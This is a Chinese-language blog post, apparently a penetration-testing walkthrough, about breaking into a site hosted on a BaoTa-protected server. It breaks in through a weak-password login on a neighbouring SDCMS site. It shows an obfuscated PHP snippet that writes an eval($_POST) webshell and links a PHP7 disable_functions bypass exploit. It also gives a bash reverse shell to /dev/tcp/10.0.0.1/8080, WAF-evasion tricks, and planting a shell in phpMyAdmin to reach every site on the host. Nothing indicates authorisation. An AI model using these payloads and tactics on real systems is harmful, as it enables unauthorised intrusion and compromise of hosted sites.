目标站点www.a.com
经过初步信息收集发现目标为宝塔搭建
源码是ThikPHP 5.0.24
微步查询同IP下存在 www.a.com,www.b.com,www.c.com
使用了宝塔waf。。规则极其严格,频繁访问就会封禁IP,并且对于访问的UA也会进行限制
以上是收集到的信息(ps:因为测试的多了手上的代理被ban了很多所以部分没有图QAQ)
当查看www.b.com发现为sdcms搭建,运气很好的使用弱口令进入了后台
SDCMS1.9版本后台可shell
详情可以查看这篇文章
https://xz.aliyun.com/t/7000

POC:

<?php
$a = 'file_p'.'ut_contents';
$data = '<?php ev'.'al($_PO'.'ST[1337]); ?>12';
$a("chonger.php",$data);
?>

当我拿下shell之后发现用蚁剑连会直接ban掉IP,后来测试发现是因为蚁剑的UA导致的
执行phpinfo会被宝塔拦截,菜刀也连接不上
懒人觉得手工不方便操作,所以使用了PHP一句话客户端,哈哈哈
使用垃圾字符上传了冰蝎的shell

下面重头戏来了,众所周知新版宝塔对于权限的限制非常严格,不能执行任何命令,不能跨当前网站目录
所以如果想要拿旁站我们第一步就是要绕过命令执行
phpinfo显示www.b.com用的是PHP7
这个时候我们就可以使用一个神器了
项目地址:
https://github.com/mm0r1/exploits/tree/master/php-json-bypass

利用脚本:https://github.com/mm0r1/exploits/blob/master/php-json-bypass/exploit.php

然后直接nc反弹个命令

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

可能这个时候大家都觉得直接在目标站点写个shell不就好了
但是我觉得,既然他这么多的站点,如果我要一个一个找目标站的目录还要写shell不累死
而且还有宝塔waf,冰蝎的小马太长不好写,蚁剑又要配置编码器,麻烦麻烦
于是我跨目录读取了phpmyadmin的目录和文件名

1.png

在phpmyadmin的根目录下写了一句简短的shell

为什么在phpmyadmin下写shell呢,因为两点,
第一你可以直接访问所有网站的目录,执行你想进行的任何操作
第二嘛,就是宝塔的waf并不会检测这个目录下的操作,所以就算你用菜刀也可以直接操作
这个应该也算是宝塔的一个漏洞吧。

标签: 绕过宝塔渗透

添加新评论